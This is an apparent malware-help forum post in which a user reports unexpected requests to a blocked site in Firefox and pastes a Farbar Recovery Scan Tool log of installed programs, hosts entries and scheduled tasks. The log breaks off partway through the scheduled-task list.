Log analysis and evaluation: Windows 8.1 + Firefox 38.0.1: request to a malware-listed site when opening any website

If you have caught a trojan or keep getting virus warnings, you can post the logs of our diagnostic tools here for evaluation by our experts. To remove viruses and trojans, the infected system must first be examined: First steps to getting help. Note that an infected system is not trustworthy and should not be used until the malware has been completely removed.
27.05.2015, 11:01 | #1 |
Windows 8.1 + Firefox 38.0.1: request to a malware-listed site when opening any website

I noticed the following: while I was in the Firefox (38.0.1) console, I saw that after a website had finished loading, an HTTP GET request was sent to a site that was blocked by Bitdefender Total Security 2015. This is roughly what it looks like (in this case I am opening the trustworthy site Wolfram|Alpha):

This "Dealdo" (it appears in the address) seems to be a dubious erotic online shop. (I only visited the Facebook page.)

Here is a list of my Firefox add-ons and plugins: https://imgur.com/a/G8AbP

Addition.txt
Code:
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 26-05-2015 Ran by Ruben at 2015-05-27 11:23:48 Running from C:\Users\Ruben\Downloads Boot Mode: Normal ========================================================== ==================== Accounts: ============================= Administrator (S-1-5-21-2798130160-1945478871-1923780282-500 - Administrator - Disabled) Gast (S-1-5-21-2798130160-1945478871-1923780282-501 - Limited - Disabled) Ruben (S-1-5-21-2798130160-1945478871-1923780282-1001 - Administrator - Enabled) => C:\Users\Ruben ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Bitdefender Antivirus (Enabled - Up to date) {9A0813D8-CED6-F86B-072E-28D2AF25A83D} AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Bitdefender Spyware-Schutz (Enabled - Up to date) {2169F23C-E8EC-F7E5-3D9E-13A0D4A2E280} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} FW: Bitdefender Firewall (Enabled) {A23392FD-84B9-F933-2C71-81E751F6EF46} ==================== Installed Programs ====================== (Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) µTorrent (HKU\S-1-5-21-2798130160-1945478871-1923780282-1001\...\uTorrent) (Version: 3.4.2.39744 - BitTorrent Inc.) 7-Zip 9.38 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0938-000001000000}) (Version: 9.38.00.0 - Igor Pavlov) Adobe Flash Player 17 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 17.0.0.188 - Adobe Systems Incorporated) Apple Application Support (32-Bit) (HKLM-x32\...\{447CDCE5-F555-429B-BFA6-642C3C6D684F}) (Version: 3.1.2 - Apple Inc.) Apple Application Support (64-Bit) (HKLM\...\{0DF7096B-715A-4233-8633-C7A16ED6D616}) (Version: 3.1.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{C4123106-B685-48E6-B9BD-E4F911841EB4}) (Version: 8.1.1.3 - Apple Inc.) Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.) Bandicam (HKLM-x32\...\Bandicam) (Version: 2.1.3.757 - Bandisoft.com) Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version: - Bandisoft.com) Bitdefender Total Security 2015 (HKLM\...\Bitdefender) (Version: 18.21.0.1497 - Bitdefender) Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.) CCleaner (HKLM\...\CCleaner) (Version: 5.04 - Piriform) Curse (HKLM-x32\...\{1F2611FB-6F69-4AA8-BECD-243BD8CB45F3}) (Version: 6.0.0.0 - Curse) DB Browser for SQLite (HKLM-x32\...\SqliteBrowser3) (Version: 3.5.1 - oldsch00l) DisplayFusion 7.1 (HKLM-x32\...\B076073A-5527-4f4f-B46B-B10692277DA2_is1) (Version: 7.1.0.0 - Binary Fortress Software) Dropbox (HKU\S-1-5-21-2798130160-1945478871-1923780282-1001\...\Dropbox) (Version: 3.4.6 - Dropbox, Inc.) Druckerdeinstallation für EPSON PX710W Series (HKLM\...\EPSON PX710W Series) (Version: - SEIKO EPSON Corporation) EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version: - ) FDUx86 (x32 Version: 1.0.0 - Sony Corporation) Hidden FileZilla Client 3.11.0.1 (HKLM-x32\...\FileZilla Client) (Version: 3.11.0.1 - Tim Kosse) Finale 2014d DEMO (HKLM-x32\...\Finale 2014) (Version: 2014.4.5030.2 - MakeMusic) Finale NotePad 2012 (HKLM-x32\...\Finale NotePad 2012) (Version: 2012..r1.1 - MakeMusic) Foxit Cloud (HKLM-x32\...\{41914D8B-9D6E-4764-A1F9-BC43FB6782C1}_is1) (Version: 3.4.96.511 - Foxit Software Inc.) Foxit PhantomPDF Standard (HKLM-x32\...\{365A8436-22A8-47BF-B1B9-6A6CDAA465CE}) (Version: 7.0.8.1216 - Foxit Software Inc.) Foxit Reader (HKLM-x32\...\Foxit Reader_is1) (Version: 7.0.8.1216 - Foxit Software Inc.) 
Genymotion version 2.4.0 (HKLM\...\{6D180286-D4DF-40EF-9227-923B9C07C08A}_is1) (Version: 2.4.0 - Genymobile) GIMP 2.8.14 (HKLM\...\GIMP-2_is1) (Version: 2.8.14 - The GIMP Team) Git version 1.9.5-preview20150319 (HKLM-x32\...\Git_is1) (Version: 1.9.5-preview20150319 - The Git Development Community) HexChat (HKLM\...\HexChat_is1) (Version: 2.10.2 - HexChat) iExplorer 3.7.3.0 (HKLM-x32\...\{7FD8B0C1-CDDA-4B4D-A577-B2E3570EA3A3}_is1) (Version: - Macroplant LLC) Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation) Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.0.1016 - Intel Corporation) IntelliJ IDEA Community Edition 14.1.3 (HKLM-x32\...\IntelliJ IDEA Community Edition 14.1.3) (Version: 141.1010.3 - JetBrains s.r.o.) iTunes (HKLM\...\{D227565A-0033-40AD-89BA-653A205CDC11}) (Version: 12.1.1.4 - Apple Inc.) Java SE Development Kit 8 Update 45 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0180450}) (Version: 8.0.450.14 - Oracle Corporation) JetBrains PhpStorm 8.0.3 (HKLM-x32\...\PhpStorm 8.0.3) (Version: 139.1348 - JetBrains s.r.o.) Jitsi (HKLM-x32\...\{DBA37B35-10E9-484D-8AF6-2BB1FC734590}) (Version: 2.8.5426 - Jitsi) Macrium Reflect Free Edition (HKLM\...\MacriumReflect) (Version: 5.3 - Paramount Software (UK) Ltd.) Macrium Reflect Free Edition (Version: 5.3.7290 - Paramount Software (UK) Ltd.) Hidden Magic MP3 Tagger 2.2.6 (HKLM-x32\...\uniquemagicmp3taggerappid_is1) (Version: - Mathias Kunter) MediaMonkey 4.1 (HKLM-x32\...\MediaMonkey_is1) (Version: 4.1 - Ventis Media Inc.) 
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation) Microsoft Office Professional Plus 2013 - de-de (HKLM\...\ProPlusRetail - de-de) (Version: 15.0.4719.1002 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-2798130160-1945478871-1923780282-1001\...\OneDriveSetup.exe) (Version: 17.3.5860.0512 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40416.0 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation) Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation) Microsoft 
Visual Studio 2010-Tools für Office-Laufzeit (x64) Language Pack - DEU (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - DEU) (Version: 10.0.50903 - Microsoft Corporation) Mozilla Firefox 38.0.1 (x86 de) (HKLM-x32\...\Mozilla Firefox 38.0.1 (x86 de)) (Version: 38.0.1 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 36.0.4 - Mozilla) Networkx64 (Version: 1.0.0 - Sony Corporation) Hidden Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.7.8.2 - Notepad++ Team) NVIDIA 3D Vision Treiber 352.86 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 352.86 - NVIDIA Corporation) NVIDIA GeForce Experience 2.4.3.31 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.4.3.31 - NVIDIA Corporation) NVIDIA Grafiktreiber 352.86 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 352.86 - NVIDIA Corporation) NVIDIA HD-Audiotreiber 1.3.34.3 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.3 - NVIDIA Corporation) NVIDIA PhysX-Systemsoftware 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation) Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4719.1002 - Microsoft Corporation) Hidden Office 15 Click-to-Run Licensing Component (Version: 15.0.4719.1002 - Microsoft Corporation) Hidden Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4719.1002 - Microsoft Corporation) Hidden Oracle VM VirtualBox 4.3.26 (HKLM\...\{5771F59A-BFC9-4FAF-A883-7642EF4BA3C3}) (Version: 4.3.26 - Oracle Corporation) PDFCreator (HKLM\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 2.1.0 - pdfforge) Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.312 - Qualcomm Atheros Communications) QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple 
Inc.) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6695 - Realtek Semiconductor Corp.) Restore (x32 Version: 1.0.0 - Sony Corporation) Hidden SCS Shortcut (x32 Version: 1.0 - Sony Creative Software Inc.) Hidden ShareX 9.10.1 (HKLM\...\82E6AC09-0FEF-4390-AD9F-0DD3F5561EFC_is1) (Version: 9.10.1 - ShareX Developers) SHIELD Streaming (Version: 4.1.1000 - NVIDIA Corporation) Hidden SHIELD Wireless Controller Driver (Version: 2.4.3.31 - NVIDIA Corporation) Hidden Skype™ 7.2 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.2.103 - Skype Technologies S.A.) SSLx64 (Version: 1.0.0 - Sony Corporation ) Hidden SSLx86 (x32 Version: 1.0.0 - Sony Corporation ) Hidden Start Menu 8 (HKLM-x32\...\IObit_StartMenu8_is1) (Version: 2.2.0 - IObit) SuperD spd2900gs (HKLM-x32\...\{B4D7DF2F-5FD7-4908-A098-298CE9898A8D}) (Version: 1.0.2102.1004 - SuperD Co., Ltd.) SuperD X-Tune (HKLM-x32\...\{2730EB73-8EEF-447F-82A0-16497631386A}) (Version: 1.0.2101.1003 - SuperD Co., Ltd.) 
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH) TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.41459 - TeamViewer) Ultra Defragmenter (HKLM-x32\...\UltraDefrag) (Version: 6.0.4 - UltraDefrag Development Team) VAIO Care (HKLM\...\{EF649526-0134-46A8-8DF3-D7F9309E48DB}) (Version: 8.4.2.12046 - Sony Corporation) VAIO Care Recovery (HKLM\...\{15B9204E-BA09-485E-8F2C-094AC0077664}) (Version: 1.1.2.13230 - Sony Corporation) VAIO Care-Hardwarediagnose-Plugin (HKLM-x32\...\{EC153498-00E1-4C9C-89BE-81527C6750BE}) (Version: 4.11.1.11220 - Sony Corporation) VAIO Control Center (HKLM-x32\...\{8E797841-A110-41FD-B17A-3ABC0641187A}) (Version: 6.0.0.08280 - Sony Corporation) VAIO Data Restore Tool (HKLM-x32\...\{57B955CE-B5D3-495D-AF1B-FAEE0540BFEF}) (Version: 1.10.0.07270 - Sony Corporation) VAIO Easy Connect (x32 Version: 8.2.0.14170 - Sony Corporation) Hidden VAIO Gesture Control (HKLM-x32\...\{692955F2-DE9F-4078-8FAA-858D6F3A1776}) (Version: 2.0.0.08240 - Sony Corporation) VAIO Gesture Control (x32 Version: 2.0.0.08240 - Sony Corporation) Hidden VAIO Improvement (HKLM-x32\...\{3A26D9BD-0F73-432D-B522-2BA18138F7EF}) (Version: 2.0.0.08090 - Sony Corporation) VAIO Media Server Settings (HKLM\...\{62A172B2-550E-499D-9A82-5190D18390AA}) (Version: 1.0.2.11060 - Sony Corporation) VAIO Update (HKLM-x32\...\{9FF95DA2-7DA1-4228-93B7-DED7EC02B6B2}) (Version: 7.0.1.02280 - Sony Corporation) VAIO*CPU-Lüfterdiagnose (HKLM-x32\...\{BCE6E3D7-B565-4E1B-AC77-F780666A35FB}) (Version: 1.1.0.09200 - Sony Corporation) VAIO-Handbuch (HKLM-x32\...\{C6E893E7-E5EA-4CD5-917C-5443E753FCBD}) (Version: 3.0.0.08100 - Sony Corporation) VAIO-Support für Übertragungen (HKLM-x32\...\{5DDAFB4B-C52E-468A-9E23-3B0CEEB671BF}) (Version: 1.8.0.08212 - Sony Corporation) VCCx64 (Version: 1.0.0 - Sony Corporation) Hidden VCCx86 (x32 Version: 1.0.0 - Sony Corporation) Hidden VHD (x32 Version: 1.0.0 - Sony Corporation) Hidden VIx64 (Version: 1.0.0 - Sony Corporation) 
Hidden VIx86 (x32 Version: 1.0.0 - Sony Corporation) Hidden VLC media player (HKLM\...\VLC media player) (Version: 2.2.0 - VideoLAN) VMLx86 (x32 Version: 1.0.0 - Sony Corporation) Hidden VPMx64 (Version: 1.0.0 - Sony Corporation ) Hidden VSSTx64 (Version: 1.0.0 - Sony Corporation ) Hidden VSSTx86 (x32 Version: 1.0.0 - Sony Corporation) Hidden VU5x64 (Version: 1.1.0 - Sony Corporation ) Hidden VU5x86 (x32 Version: 1.1.0 - Sony Corporation ) Hidden VueScan x64 (HKLM\...\VueScan x64) (Version: - ) VWSTx86 (x32 Version: 1.0.0 - Sony Corporation) Hidden Wireshark 1.12.5 (64-bit) (HKLM-x32\...\Wireshark) (Version: 1.12.5 - The Wireshark developer community, hxxp://www.wireshark.org) XAMPP (HKLM-x32\...\xampp) (Version: 5.6.8-0 - Bitnami) X-Lite (HKLM-x32\...\{8698D30E-8FFC-4BCD-A13A-3DAB86C0D42E}) (Version: 48.7.6464 - CounterPath Corporation) XMedia Recode Version 3.2.2.4 (HKLM-x32\...\{DDA3C325-47B2-4730-9672-BF3771C08799}_is1) (Version: 3.2.2.4 - XMedia Recode) X-Mouse Button Control 2.10.2 (HKLM-x32\...\X-Mouse Button Control) (Version: 2.10.2 - Highresolution Enterprises) ==================== Custom CLSID (Whitelisted): ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.) 
CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{654a14c2-f1da-4026-b8f4-6e6dac64644c}\InprocServer32 -> C:\WINDOWS\system32\dfshim.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{ca586c80-7c84-4b88-8537-726724df6929}\InprocServer32 -> C:\Program Files (x86)\Git\git-cheetah\git_shell_ext64.dll () CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\Ruben\AppData\Local\Microsoft\OneDrive\17.3.5860.0512\amd64\FileSyncApi64.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.) 
CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.) ==================== Restore Points ========================= 13-05-2015 07:25:51 Windows Update 18-05-2015 12:03:04 Removed Java 8 Update 45 23-05-2015 18:10:19 Installed Jitsi ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2013-08-22 15:25 - 2015-04-15 17:49 - 00001550 ____A C:\WINDOWS\system32\Drivers\etc\hosts 127.0.0.1 onhax.net 127.0.0.1 www.onhax.net 127.0.0.1 forum.onhax.net 127.0.0.1 https://forum.onhax.net 127.0.0.1 labs.onhax.net 127.0.0.1 do2dear.net 127.0.0.1 p30world.com 127.0.0.1 brarstuff.com 127.0.0.1 rsload.net 127.0.0.1 bandicam.com 127.0.0.1 ssl.bandisoft.com 127.0.0.1 idm-crack-patch.blogspot.in 127.0.0.1 parth8641.blogspot.com 127.0.0.1 www.hamrick.com 127.0.0.1 static.hamrick.com 127.0.0.1 stats.hamrick.com ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) 
Task: {03C91028-657D-4423-ACB7-5B756163654A} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2015-05-14] (Microsoft Corporation) Task: {0B28ACAA-4BDE-435A-82C4-3D97F02769E5} - System32\Tasks\Microsoft Office 15 Sync Maintenance for RubensVaio-Ruben RubensVaio => C:\Program Files\Microsoft Office 15\Root\Office15\MsoSync.exe [2015-03-10] (Microsoft Corporation) Task: {1E57804B-1ED4-4D5D-9106-B4AF2F176224} - System32\Tasks\Sony Corporation\VAIO Update\VAIO Update => C:\Program Files\Sony\VAIO Update\VAIOUpdt.exe [2014-02-28] (Sony Corporation) Task: {20861EEF-3A03-42F4-A838-FDC40C7C9A12} - System32\Tasks\Microsoft\Windows\Setup\gwx\refreshgwxconfig => C:\Windows\system32\GWX\GWXConfigManager.exe [2015-03-24] (Microsoft Corporation) Task: {24A595BD-D1B1-4EFA-A1E8-8CAECF20EB42} - System32\Tasks\USER_ESRV_SVC => Wscript.exe //B //NoLogo "C:\Program Files\Sony\VAIO Care\ESRV\task.vbs" Task: {271304AE-4247-4B0B-85EA-0AC3419AB74D} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-05-19] (Adobe Systems Incorporated) Task: {32CA79B8-D216-44F2-AEAB-903ADF0C94C8} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-04-14] (Microsoft Corporation) Task: {3321A6D4-11EA-46DB-9302-9168FFCACFE3} - System32\Tasks\Sony Corporation\VAIO Care\VCCheckIolo => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation) Task: {355229AC-40E8-4FB5-B14C-47DDAE6BB1BF} - System32\Tasks\Sony Corporation\VAIO Care\VAIO Care => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation) Task: {4BBBB335-FA93-441D-B6C2-36D9AB317B37} - System32\Tasks\Sony Corporation\VAIO Care\VCMetrics => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation) Task: {51D843BE-4E3A-4A98-985D-8C4CF538B8DD} - System32\Tasks\Sony Corporation\VAIO Care\UpdateSolution => 
C:\Program Files\Sony\VAIO Care\Solution.Updater.exe [2014-12-03] (Sony Corporation) Task: {61130F71-8742-45D6-A4E1-FB637B1921F6} - System32\Tasks\Sony Corporation\VAIO Gesture Control\VCGULogonTask => C:\Program Files (x86)\Sony\VAIO Camera Gesture Utility\VCGU.exe [2012-08-04] (Sony Corporation) Task: {6FE63A85-9C0B-4320-84A4-CD51083C79B6} - System32\Tasks\Microsoft\Windows\Setup\gwx\refreshgwxcontent => C:\Windows\system32\GWX\GWXConfigManager.exe [2015-03-24] (Microsoft Corporation) Task: {765339AF-3C12-49A4-B1BC-933BD59B9334} - System32\Tasks\Microsoft\Windows\Setup\gwx\launchtrayprocess => C:\Windows\system32\GWX\GWX.exe [2015-03-24] (Microsoft Corporation) Task: {77F73AB1-2BF9-4BAF-B6FD-9403F07EDAFA} - System32\Tasks\Sony Corporation\VAIO Control Center\NetworkSetting\NetworkSetting Logon Start => C:\Program Files (x86)\Sony\VAIO Control Center\NetworkSetting\NetworkClient Task: {7A27FD2C-4200-4E77-B499-56228EAEDD03} - System32\Tasks\Sony Corporation\VAIO Care\VCOneClick => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation) Task: {8F0B6E2A-D772-4017-963D-4D2B18A70033} - System32\Tasks\Sony Corporation\VAIO Improvement\VAIOImprovementMonitorSystem => C:\Program Files\Sony\VAIO Improvement\vim.exe [2013-04-03] (Sony Corporation) Task: {952CBAA9-3887-4259-BA73-862AF0AEF16D} - System32\Tasks\Microsoft_Hardware_Launch_IPoint_exe => c:\Program Files\Microsoft IntelliPoint\IPoint.exe Task: {95B5A631-5805-4407-96E9-9C6776689825} - System32\Tasks\Sony Corporation\VAIO Improvement\VAIOImprovementUploader => C:\Program Files\Sony\VAIO Improvement\viuploader.exe [2012-08-09] (Sony Corporation) Task: {A2EA898B-2E09-4C82-9C64-8EED1FF1DF6E} - System32\Tasks\Sony Corporation\VAIO Care\ActiveStatusCollect => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation) Task: {A9781B7B-C893-443A-82EB-A9FDEE6000B3} - System32\Tasks\Sony Corporation\VAIO Care\DeployCRMflag => C:\Program Files\Sony\VAIO Care\DeployCRMflag.exe 
[2014-01-16] (Sony Corporation) Task: {AB90CD73-64F5-45CA-93CD-9DB6BD1E1F1F} - System32\Tasks\update-S-1-5-21-2798130160-1945478871-1923780282-1001 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [2014-11-28] () Task: {ACA7E4BC-9D11-4DAC-9C89-915E7E92ACD2} - System32\Tasks\Sony Corporation\VAIO Care\CheckSystemInfo => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation) Task: {BAD4621D-A636-4B10-9785-ABE52CB0FBF2} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-04-14] (Microsoft Corporation) Task: {C5081CD6-0561-4F2B-8689-285F9C321092} - System32\Tasks\Microsoft OneDrive Auto Update Task-S-1-5-21-2798130160-1945478871-1923780282-1001 => %localappdata%\Microsoft\OneDrive\OneDrive.exe Task: {C74A71A1-C1F8-4912-A221-88E2A38C3007} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-03-13] (Piriform Ltd) Task: {CB31D35B-2569-4CAE-8356-147FCE026D6F} - System32\Tasks\Sony Corporation\VAIO Care\VCRLog => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation) Task: {DDA0A5F1-6933-40B4-A7B0-F03F60881A3D} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2015-03-27] (Microsoft Corporation) Task: {DE6EAFBD-DD25-4EFC-B75F-3545323C2F47} - System32\Tasks\Sony Corporation\VAIO Improvement\VAIOImprovementMonitorUser => C:\Program Files\Sony\VAIO Improvement\vim.exe [2013-04-03] (Sony Corporation) Task: {DF0C1261-3171-41F3-8E1D-9D4D045C9465} - System32\Tasks\Apple Diagnostics => C:\Program Files (x86)\Common Files\Apple\Internet Services\EReporter.exe Task: {DF9838E6-ABEF-45E6-82F6-7D9CC9B99852} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2015-03-27] (Microsoft Corporation) Task: {E14B16FC-63D8-4C18-9CAC-39BA994EC36D} - System32\Tasks\Sony 
Corporation\VAIO Update\VAIO Update Self Repair => C:\Program Files\Sony\VAIO Update\VUSR.exe [2014-03-01] (Sony Corporation) Task: {E434E6B4-C0FC-4238-B2A6-EB3A265CB241} - System32\Tasks\Microsoft\Windows\Setup\gwx\runappraiser => C:\Windows\system32\GWX\GWXConfigManager.exe [2015-03-24] (Microsoft Corporation) Task: {EBDE38DB-C1AB-496A-89BE-F5AFC1FC3E17} - System32\Tasks\Sony Corporation\VAIO Care\GetPOTInfo => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation) Task: {EFC29B24-98E1-43F2-A2B7-0AA3FD271A3D} - System32\Tasks\Sony Corporation\VAIO Care\UploadPOT => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation) Task: {F097C3CA-BC1A-4D8A-8D24-FBE34B061625} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [2014-11-28] () Task: {F3A21A1D-F877-441E-81C3-E40095CD3422} - System32\Tasks\Sony Corporation\VAIO Care\VCSelfHeal => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation) Task: C:\WINDOWS\Tasks\Adobe Flash Player 